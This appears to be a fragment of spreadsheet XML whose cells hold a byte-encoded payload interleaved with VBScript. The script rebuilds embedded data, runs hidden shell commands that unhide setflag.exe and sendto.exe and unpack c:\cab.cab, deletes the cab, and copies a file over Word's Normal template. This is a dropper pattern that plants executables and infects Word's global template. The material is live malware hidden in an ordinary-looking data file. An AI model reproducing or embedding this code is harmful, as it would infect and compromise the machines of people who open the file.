124 89 233 95 202 126 151 204 132 138 3 126 21 252 27 224 79 148 254 87 216 239 230 150 77 216 239 14 173 185 173 253 110 222 26 178 30 8 188 183 24 226 117 224 247 174 249 35 246 187 8 249 231 217 239 146 54 255 67 246 187 122 219 23 161 255 203 224 175 129 31 3 79 67 182 9 124 6 248 111 149 253 165 236 119 181 249 113 192 223 98 240 143 128 111 40 251 11 217 239 198 211 143 13 217 38 34 86 157 100 87 219 194 189 69 248 121 215 117 254 6 29 124 96 244 55 112 77 176 76 206 7 72 0 184 27 226 209 254 33 198 216 143 129 5 130 227 176 154 48 85 108 210 213 87 160 42 108 130 213 165 0 163 177 96 112 73 226 109 70 140 165 228 53 112 163 121 196 106 198 107 27 177 207 209 172 91 209 6 232 107 22 255 35 69 71 105 131 185 235 58 106 13 13 192 130 255 223 211 55 153 104 224 158 240 115 133 64 2 228 </t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 209 166 77 124 208 66 62 112 193 218 140 71 254 252 67 210 187 56 176 37 246 137 155 46 211 235 90 235 128 90 55 188 237 54 31 172 205 214 62 88 179 169 249 5 247 195 221 193 173 242 249 2 134 141 158 186 203 80 65 83 196 248 212 204 23 181 151 102 70 152 131 48 202 61 62 159 167 78 222 230 32 101 63 218 170 189 9 160 201 221 96 34 150 39 144 207 114 50 158 4 81 36 67 229 44 50 154 24 87 85 9 174 140 62 44 69 113 105 142 202 205 86 185 44 173 28 173 150 80 238 194 134 46 125 28 179 145 56 69 26 177 114 12 225 159 4 151 213 231 211 192 69 87 182 102 4 205 56 64 106 179 170 153 207 19 155 77 161 250 162 253 188 185 235 71 72 248 59 128 60 221 201 135 141 217 99 178 5 168 1 12 79 124 91 112 125 196 151 143 169 74 58 202 228 34 14 88 232 32 57 98 245 197 252 142 143 216 237 30 149 251 72 235 33 96 152 104 23 6 93 14 131 37 69 26 150 47 146 149 17 184 51 32 32 46 26 113 165 209 172 35 191 99 182 185 11 25 70 59 55 251 169 187 180 161 125 181 10 204 80 247 30 194 83 74 254 163 98 249 112 173 64 222 163 9 111 169 91 15 74 244 82 13 231 77 9 26 206 31 9 213 67 4 231 233 19 56 219 206 17 148 161 247 243 236 207 189 208 201 197 175 245 195 254 8 240 241 249 56 218 231 83 146 52 100 188 158 58 43 114 79 56 170 34 93 186 53 119 125 23 95 147 7 46 53 96 176 33 155 193 35 215 125 210 43 149 170 108 90 40 143 98 25 135 120 165 164 123 132 187 10 137 205 92 98 14 158 72 241 136 190 157 152 218 219 108 167 44 109 </t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t xml:space="preserve">59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238 35 159 199 43 223 253 5 57 91 74 106 108 13 206 217 70 112 13 236 87 217 5 42 55 228 213 218 199 45 163 183 10 77 226 198 7 166 22 215 228 160 110 67 44 249 223 253 202 170 199 41 39 91 30 253 138 78 73 218 208 79 247 150 245 211 104 85 178 162 183 255 77 164 65 243 81 39 146 207 102 155 184 196 208 133 167 148 180 78 180 200 70 62 115 90 232 88 8 7 215 147 178 125 62 21 54 14 108 142 220 212 9 41 41 183 210 3 66 182 43 10 8 149 43 203 102 130 25 157 151 48 254 0 177 73 53 144 252 150 203 57 71 197 183 187 13 226 5 145 17 29 180 59 242 174 58 191 97 171 99 242 223 110 76 186 73 55 233 38 221 164 155 116 147 110 210 77 186 73 55 233 38 221 127 185 251 254 118 138 26 175 165 40 147 159 162 102 129 191 23 252 82 240 69 224 31 1 95 11 190 25 124 59 248 189 224 15 128 63 4 254 36 120 25 124 2 212 159 13 126 17 248 82 240 181 224 119 130 191 12 109 238 131 240 167 224 127 14 254 8 248 19 224 63 194 50 240 55 192 167 60 78 81 89 224 179 193 47 4 255 29 240 101 224 55 129 111 0 255 52 248 103 193 191 4 254 231 143 107 248 170 224 10 178 28 84 5 248 32 215 200 214 239 240 91 253 193 96 83 208 74 81 105 41 20 181 161 108 157 199 163 229 96 146 242 148 172 93 29 151 164 138 214 149 59 75 214 222 204 89 191 52 119 81 94 90 202 3 86 174 177 230 177 6 191 149 109 178 214 55 214 179 245 53 13 245 187 253 214 58 127 77 179 86 15 225 150 33 28 254 164 129 191 177 137 123 188 206 218 210 92 179 205 111 221 14 125 55 52 237 170 </t>
  </si>
  <si>
    <t xml:space="preserve">143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5 102 7 215 192 214 179 117 65 127 77 45 204 208 182 39 190 10 127 251 121 209 43 225 111 17 0 120 90 74 205 99 141 77 193 29 48 1 177 223 150 96 253 193 29 245 141 183 206 87 110 254 109 219 243 55 194 12 54 53 238 240 55 178 0 142 176 121 183 133 173 9 62 206 33 96 75 108 126 115 23 33 236 246 134 38 232 174 241 113 107 115 83 125 35 75 170 66 78 173 191 86 235 191 188 126 91 176 169 165 105 59 107 245 214 183 224 82 21 230 228 88 215 235 27 180 172 254 177 96 77 176 13 225 82 112 207 233 217 46 156 142 185 41 41 110 109 80 223 193 239 151 22 46 92 72 45 143 141 178 177 6 160 184 198 39 26 155 118 53 174 160 168 213 126 182 172 166 133 117 194 22 216 233 119 55 53 115 205 36 79 75 251 234 27 107 155 118 81 229 254 150 150 154 199 253 43 155 90 157 20 215 226 15 218 22 45 172 109 104 184 121 222 241 252 172 88 231 160 86 130 199 248 103 16 142 232 241 157 21 14 106 55 248 229 181 55 225 7 240 220 109 253 239 65 59 142 227 108 21 54 237 216 81 211 88 91 86 223 232 119 82 172 1 114 188 254 96 11 236 35 138 234 160 92 112 74 96 53 182 193 36 82 63 54 20 195 30 95 21 244 227 232 12 250 220 147 37 163 168 59 169 194 134 166 22 127 49 52 212 224 167 94 166 86 53 112 45 117 171 234 27 252 43 185 237 219 161 57 138 58 159 224 11 214 179 126 204 163 254 150 180 228 108 128 51 64 101 37 172 135 157 77 178 169 23 18 54 232 219 216 31 235 148 26 37 56 114 193 32 236 192 88 102 32 193 227 103 177 138 27 183 158 31 250 255 95 9 149 141 117 164 243 90 87 </t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t xml:space="preserve">235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 237 77 78 234 239 200 12 22 249 91 216 96 83 27 245 67 146 42 4 18 1 232 80 111 37 120 53 234 72 150 234 193 132 245 108 67 101 227 46 56 13 212 235 177 18 109 234 169 151 72 189 245 126 45 217 142 88 197 225 176 152 210 90 68 52 156 212 91 100 29 220 216 61 245 11 114 202 10 221 20 245 16 98 182 206 85 142 241 21 24 199 37 114 214 214 6 201 218 29 49 148 1 69 208 15 59 204 121 13 246 224 106 172 93 183 93 91 239 139 134 137 89 220 208 20 155 90 234 45 67 89 97 121 77 179 54 93 80 43 28 159 134 217 243 104 179 129 41 156 29 128 240 222 154 3 48 107 92 235 215 186 202 190 122 214 39 221 164 155 116 147 110 210 77 186 73 55 233 254 148 59 116 167 131 250 241 106 199 68 122 227 108 199 215 96 238 219 241 208 130 45 247 237 88 132 127 108 11 40 42 248 88 14 181 42 91 179 72 68 23 254 158 99 34 52 24 226 42 90 190 222 31 218 118 24 254 8 62 9 186 159 116 147 238 207 117 137 176 245 82 245 248 28 136 199 126 207 241 175 227 226 248 175 147 24 61 254 87 113 241 61 113 241 189 113 241 31 196 197 159 141 139 63 23 23 71 67 65 252 105 69 84 6 60 163 203 217 152 192 109 111 77 124 110 230 55 237 109 235 54 237 227 183 107 143 105 70 21 71 33 196 250 7 30 211 190 189 111 133 16 127 100 160 24 194 233 16 102 67 152 14 97 180 70 251 230 36 12 33 54 252 60 132 179 80 76 135 16 127 182 241 190 26 237 127 9 83 16 182 66 48 188 213 65 161 242 97 8 194 221 16 158 128 16 255 35 194 187 248 17 10 132 111 64 24 213 126 228 146 156 199 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 200 30 245 130 158 238 211 241 57 160 247 247 247 122 254 255 209 241 123 79 47 63 173 151 103 77 209 230 34 230 12 9 52 217 66 104 196 191 245 233 182 167 231 234 249 63 61 175 133 125 63 209 194 206 31 15 225 146 81 142 39 67 36 60 8 240 253 251 207 238 183 222 230 28 116 142 107 161 67 15 255 247 159 9 239 212 195 67 0 255 254 75 23 95 154 69 253 235 75 242 75 27 111 223 254 147 125 36 134 63 227 82 113 118 243 89 43 181 229 108 224 236 162 175 195 159 58 243 241 208 117 144 160 159 140 213 156 116 147 110 210 77 186 73 55 233 38 221 164 155 116 255 63 220 255 3 24 156 25 249 28 30 0 128 67 75 236 61 11 116 83 199 149 35 33 176 73 28 91 124 28 12 24 243 16 159 24 97 20 155 143 237 240 9 194 198 4 103 49 22 182 49 180 113 106 132 45 35 61 100 73 145 100 12 27 118 81 119 113 14 212 104 227 238 226 46 77 147 28 218 101 123 186 57 156 214 105 56 45 39 101 79 156 141 115 32 41 73 73 154 156 165 105 178 135 228 108 55 228 71 217 109 210 165 141 131 246 222 59 243 158 222 179 36 219 73 211 108 207 238 27 233 206 247 206 204 157 59 119 62 111 222 155 153 186 47 247 209 28 223 66 207 44 184 61 95 204 235 198 65 11 226 230 206 125 50 151 157 158 252 194 188 51 166 205 47 204 107 242 250 34 234 59 218 54 119 0 223 146 238 242 72 225 174 128 228 11 72 27 234 27 165 206 96 187 199 113 203 45 55 45 80 158 185 190 246 187 95 254 244 189 191 63 172 192 166 255 254 230 225 231 193 252 206 135 143 146 105 251 240 33 50 27 124 109 94 12 87 242 118 213 48 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 131 142 112 36 220 198 68 25 92 2 207 149 130 231 220 57 231 55 119 106 179 169 107 108 174 106 174 43 47 117 108 216 188 217 104 69 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 245 167 175 134 31 175 144 227 190 10 57 112 188 82 126 212 90 41 71 0 182 236 170 144 95 245 86 200 102 48 75 106 236 242 67 96 62 212 86 33 111 159 82 41 183 63 81 33 255 96 131 93 126 181 205 46 215 54 217 229 51 143 216 229 175 65 252 229 7 86 202 147 79 87 200 123 0 255 158 45 118 121 251 78 187 60 167 163 66 222 2 241 76 109 229 242 235 127 99 151 15 62 82 41 63 59 80 46 251 250 203 229 111 255 176 66 254 171 29 118 249 155 219 237 178 251 137 74 249 69 200 227 69 192 157 243 147 74 217 12 230 218 123 43 228 59 255 173 88 190 145 87 41 15 77 44 151 191 51 173 82 126 254 214 74 185 6 112 191 59 169 92 94 51 189 82 222 8 254 229 64 255 87 238 178 203 222 175 219 229 119 165 10 249 73 160 97 101 94 133 124 3 252 176 124 139 216 116 42 231 220 101 78 246 70 25 127 0 190 110 117 178 77 96 22 205 117 178 133 0 7 240 126 72 128 39 1 150 74 78 246 10 128 109 30 135 173 0 67 0 102 155 147 57 4 212 3 108 21 240 85 128 127 0 248 145 128 127 5 248 133 128 137 243 57 44 2 40 22 176 31 224 91 0 223 23 240 51 128 151 4 196 23 56 217 227 11 57 124 99 145 147 253 248 54 14 205 197 78 118 239 98 39 123 86 64 187 221 201 246 44 113 178 159 11 248 4 32 183 196 201 182 1 252 5 192 63 2 188 0 240 17 192 123 75 157 108 154 195 201 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 67 250 9 210 251 72 63 68 250 89 210 157 164 127 143 244 211 164 187 72 223 68 186 149 244 16 233 37 164 15 144 238 37 253 36 233 18 233 57 164 199 72 207 38 253 97 43 114 211 251 225 52 39 187 114 21 191 12 32 85 170 89 146 241 231 222 159 125 237 111 79 221 253 88 227 175 115 170 127 159 39 190 192 55 49 101 53 198 21 14 202 158 182 104 25 126 88 16 99 205 106 232 208 173 162 158 132 66 123 193 12 60 180 142 251 31 254 237 116 93 123 71 18 154 171 86 206 187 54 215 174 243 255 75 157 235 38 54 89 44 140 93 46 114 178 195 211 33 173 107 165 148 73 54 75 126 179 243 14 192 89 72 15 97 223 52 254 173 1 190 63 199 179 185 122 211 244 53 244 241 122 192 19 21 22 119 84 83 172 15 77 201 178 92 132 60 79 64 123 29 50 51 42 199 162 169 184 2 229 100 118 214 194 214 179 106 182 10 204 110 200 109 63 152 123 217 46 208 125 44 192 162 204 195 194 96 122 192 214 2 76 11 179 32 147 193 213 6 238 50 230 32 204 144 209 225 255 31 82 40 119 138 42 118 242 187 132 213 54 0 110 105 250 161 138 171 47 155 214 127 253 39 191 8 188 243 163 200 71 55 129 228 226 15 219 135 86 185 192 141 242 110 17 235 184 102 145 54 166 213 34 112 173 162 61 109 154 145 252 214 13 115 50 197 184 139 111 184 40 75 10 52 195 239 60 146 11 195 43 0 34 32 139 97 144 213 16 72 36 74 236 110 144 202 14 176 249 65 74 35 32 205 17 146 225 78 144 219 93 170 228 162 218 77 50 29 129 120 232 231 99 110 136 209 1 88 126 214 78 50 143 10 191 255 209 183 3 55 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 178 60 188 147 85 82 231 223 251 180 64 60 37 6 246 30 251 0 187 83 148 43 125 8 151 27 44 97 27 132 135 160 62 21 158 167 75 19 203 221 14 174 168 90 191 73 236 70 176 253 185 136 167 207 79 27 139 127 199 212 70 189 97 68 164 128 37 218 173 169 117 198 236 25 234 33 83 140 73 106 154 124 224 89 8 253 109 61 171 131 20 92 172 6 236 11 129 227 183 3 134 68 252 138 146 212 236 2 215 18 72 17 117 60 99 127 44 154 194 80 127 1 33 123 73 220 0 148 44 10 116 38 49 139 71 161 61 21 27 235 248 15 165 55 53 85 45 141 218 54 18 133 112 172 5 124 143 21 164 182 16 128 148 202 88 5 91 6 161 203 216 114 208 151 147 94 6 191 82 162 143 191 115 58 76 223 127 185 129 138 54 248 117 138 246 130 239 86 66 224 27 129 159 34 207 168 114 41 255 118 72 27 235 189 155 248 134 189 138 95 248 50 209 70 83 249 164 228 119 148 242 11 209 120 216 73 212 243 190 137 1 5 62 234 39 194 244 117 32 151 81 196 232 2 28 137 237 0 217 225 210 214 38 232 80 242 84 228 163 72 149 93 73 199 157 136 24 109 35 66 158 118 65 250 30 145 6 82 24 2 252 165 16 186 10 220 237 212 7 120 168 29 106 219 75 97 90 190 107 83 102 172 36 165 239 146 198 140 211 92 181 190 92 121 103 213 218 186 119 151 187 217 29 222 208 21 226 118 220 166 69 27 251 68 152 43 12 51 21 190 119 139 135 135 61 158 198 104 88 141 91 187 12 98 11 59 248 131 163 58 24 218 175 186 235 130 123 61 42 46 38 83 31 242 4 52 249 18 178 80 138 95 83 36 186 197 163 </t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 176 189 56 133 212 31 47 119 230 16 222 224 55 231 55 137 4 63 101 238 92 205 251 151 97 150 126 174 230 26 134 242 35 238 149 187 120 193 192 190 253 92 207 10 200 209 194 204 177 115 61 37 96 195 239 68 227 100 115 37 242 113 186 223 113 164 103 232 70 34 113 174 231 44 232 24 35 222 143 182 120 60 132 164 230 227 179 64 60 94 66 246 28 202 107 24 95 189 203 224 148 184 19 91 172 204 188 254 25 10 226 214 68 62 62 95 196 251 209 209 32 110 6 75 228 159 228 232 19 137 168 87 32 11 162 178 231 130 200 246 12 246 38 87 214 227 109 137 23 122 251 209 247 200 148 222 158 139 104 174 183 244 246 99 4 188 58 166 231 18 249 228 200 38 239 73 202 17 83 223 42 242 74 228 227 227 205 95 15 73 189 23 227 117 49 78 60 100 57 73 205 242 2 68 225 89 98 127 20 175 137 185 226 113 116 37 19 192 103 165 222 243 156 152 211 255 9 196 188 210 107 58 98 238 93 111 57 82 101 233 93 159 125 164 42 187 183 54 231 200 221 152 255 21 204 191 127 39 47 100 33 47 164 200 31 108 37 156 183 33 226 101 161 134 72 217 156 200 183 18 90 78 222 83 20 222 51 24 221 2 100 102 101 32 83 102 80 24 136 141 238 6 181 238 144 80 48 240 57 239 141 71 162 148 139 174 150 38 243 106 177 20 100 170 22 167 174 90 110 82 51 95 80 160 205 156 115 226 177 107 227 175 150 74 202 209 153 169 90 78 168 213 114 179 154 101 75 129 190 90 78 164 175 22 136 61 168 198 206 225 229 219 135 185 41 60 241 170 194 186 53 190 237 98 131 90 184 92 206 197 154 139 128 115 154 243 13 159 146 243 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 186 190 180 141 191 72 91 238 129 116 229 158 171 161 74 148 123 158 40 247 64 230 114 47 80 133 161 96 166 78 24 250 93 92 92 209 195 165 74 50 151 7 46 156 183 92 5 225 28 234 189 233 8 94 44 117 100 147 165 247 238 236 35 155 178 123 27 114 142 184 212 102 202 59 33 209 16 147 205 52 222 159 195 25 209 199 169 210 54 90 206 18 145 163 174 209 246 83 163 125 57 239 16 94 45 0 180 47 84 105 95 161 163 253 28 245 172 46 242 59 171 250 29 187 193 87 61 206 245 28 5 219 205 36 240 131 163 246 67 37 31 100 238 135 84 254 156 189 161 45 160 150 63 31 188 159 153 63 28 227 167 28 35 142 4 1 86 127 31 154 46 75 111 28 105 69 220 254 227 228 147 35 79 240 54 205 84 217 57 162 242 215 100 236 231 128 71 183 169 60 242 143 224 209 105 176 177 71 77 96 59 5 182 9 49 146 175 99 152 75 77 223 168 108 201 127 127 212 238 249 208 204 212 238 249 144 82 239 241 28 173 32 64 3 232 199 204 33 131 19 90 9 200 209 8 141 82 170 9 74 169 172 106 239 157 119 104 30 23 132 98 181 144 39 63 155 32 212 13 166 237 231 149 18 207 127 111 20 65 216 214 55 170 20 188 253 238 88 82 240 236 187 127 116 41 176 171 12 26 156 153 58 202 108 16 4 92 16 4 92 84 8 120 69 33 224 146 32 96 68 171 46 25 217 170 11 51 182 106 77 111 166 169 191 32 175 191 37 42 121 255 158 70 72 167 207 114 10 33 205 92 127 39 70 173 191 182 119 50 215 159 152 255 112 12 202 5 176 226 3 104 222 109 233 37 2 16 55 126 134 124 4 250 84 129 126 84 160 </t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 128 117 210 80 170 178 225 98 154 90 234 251 143 241 215 18 73 3 159 25 166 145 134 101 201 25 232 108 253 12 0 109 52 159 63 195 41 90 78 204 141 65 29 175 225 30 43 196 100 62 145 127 158 207 19 227 107 168 4 248 50 197 197 159 100 32 71 124 205 226 194 179 187 241 40 240 252 3 52 183 225 120 151 120 50 184 111 207 187 97 54 54 147 16 151 33 138 226 13 205 198 107 74 118 168 189 88 57 226 237 67 188 158 16 103 96 122 188 10 196 59 138 120 58 18 82 240 42 17 239 228 216 249 222 129 211 40 155 218 179 224 139 36 112 198 241 126 152 173 220 201 249 119 102 118 234 224 115 126 182 118 240 209 119 82 186 241 194 197 197 54 71 243 148 17 143 159 229 131 240 240 13 117 16 22 247 210 64 216 235 55 52 113 245 5 184 172 45 64 188 231 117 30 225 125 77 98 233 199 216 73 202 152 129 114 129 43 46 222 43 99 115 123 53 226 13 143 205 237 53 136 103 45 28 147 219 107 17 175 164 112 204 124 239 68 60 103 225 152 249 174 67 188 246 177 243 117 210 19 186 54 203 68 126 37 23 208 245 106 19 9 21 234 158 16 109 106 7 35 132 66 169 42 46 20 52 197 162 184 167 196 211 118 218 254 74 215 87 169 131 40 175 88 122 84 206 209 138 137 82 129 36 6 250 113 238 254 183 198 26 231 190 244 214 167 26 231 236 111 141 127 156 163 94 166 223 153 118 156 83 100 118 152 139 96 142 102 114 168 76 244 39 42 178 87 0 12 175 226 61 205 17 234 205 56 191 115 156 74 215 215 255 230 248 7 194 88 97 166 238 22 69 188 90 173 215 135 11 83 187 216 165 111 126 62 3 225 216 19 33 90 134 </t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30 5 117 97 89 242 253 246 169 229 44 237 89 18 168 158 132 176 33 128 151 1 222 2 248 47 128 73 48 158 221 10 176 0 96 5 192 6 128 102 0 47 192 1 128 7 0 142 1 76 49 179 216 119 193 60 13 176 3 236 255 2 230 5 128 215 0 174 1 152 97 64 179 2 236 132 176 11 0 54 176 151 3 108 0 104 0 104 1 56 12 254 126 48 31 0 56 14 240 24 192 25 128 231 87 226 58 55 139 93 2 243 10 192 239 1 114 97 224 43 4 88 1 80 85 142 231 12 66 45 2 68 1 14 1 124 3 224 4 192 99 0 167 203 121 249 70 238 185 104 173 174 109 11 210 178 118 171 187 93 110 237 8 69 221 129 116 107 169 105 215 90 71 174 231 82 10 237 190 189 173 157 229 43 146 41 134 61 157 101 250 208 229 203 88 154 213 220 100 120 89 185 79 231 19 86 188 210 174 18 87 215 70 124 73 154 171 189 123 34 209 61 218 21 115 177 26 175 95 211 86 169 115 243 2 99 42 247 133 163 26 172 218 136 26 135 159 143 199 15 121 75 150 94 179 178 175 45 235 72 202 137 21 130 26 151 122 210 222 200 245 111 253 219 0 162 199 31 220 61 218 202 255 200 149 252 17 28 78 225 32 247 210 190 19 24 25 174 175 133 240 40 111 20 148 21 121 54 234 187 1 124 39 50 190 55 5 169 239 51 50 190 151 168 174 85 106 44 221 27 18 205 27 20 44 139 223 223 217 229 231 177 20 185 174 174 245 236 11 233 36 88 188 141 49 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 86 37 207 208 155 64 103 1 238 96 44 134 </t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 176 213 178 122 182 5 220 181 160 111 4 59 170 127 182 252 250 6 167 71 217 77 170 191 9 193 194 82 239 70 216 64 122 51 237 216 218 40 246 74 213 178 0 237 5 69 181 128 98 53 65 168 27 124 35 98 127 99 114 15 228 100 203 128 37 100 194 116 27 197 78 56 220 131 154 154 210 102 194 41 101 43 0 238 32 179 138 120 83 194 114 192 191 90 236 35 195 60 246 67 137 220 224 226 123 182 220 172 29 236 62 202 109 5 155 10 184 124 23 118 59 235 162 189 172 90 220 145 59 85 25 165 143 59 116 21 122 154 197 110 210 36 253 184 219 178 84 236 165 43 37 92 125 250 35 99 104 241 57 61 181 186 92 253 26 138 70 238 32 231 252 158 5 113 234 137 83 187 197 94 57 191 74 95 32 99 92 237 158 68 228 228 4 38 73 102 106 27 40 49 101 93 146 100 5 187 133 228 105 89 151 213 202 93 40 109 203 187 240 179 103 186 51 128 98 114 225 26 204 216 114 69 11 140 197 184 129 63 244 2 109 112 16 99 37 232 143 27 149 201 192 95 130 190 165 24 181 63 200 190 214 141 122 34 113 173 59 196 242 0 251 90 136 113 147 233 76 106 188 121 49 150 123 25 45 185 87 185 113 121 92 125 14 167 3 224 65 70 119 15 12 66 233 7 179 0 242 210 192 65 198 206 37 52 113 18 124 111 168 196 251 40 149 79 49 243 23 203 167 207 85 61 152 200 10 105 93 137 68 86 183 240 200 230 159 190 100 117 115 15 229 83 24 37 92 117 135 152 206 157 100 245 23 225 62 124 88 235 78 186 208 141 174 171 87 21 183 222 133 106 52 215 255 178 74 164 85 79 39 18 195 236 32 52 128 185 48 86 101 1 160 121 240 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
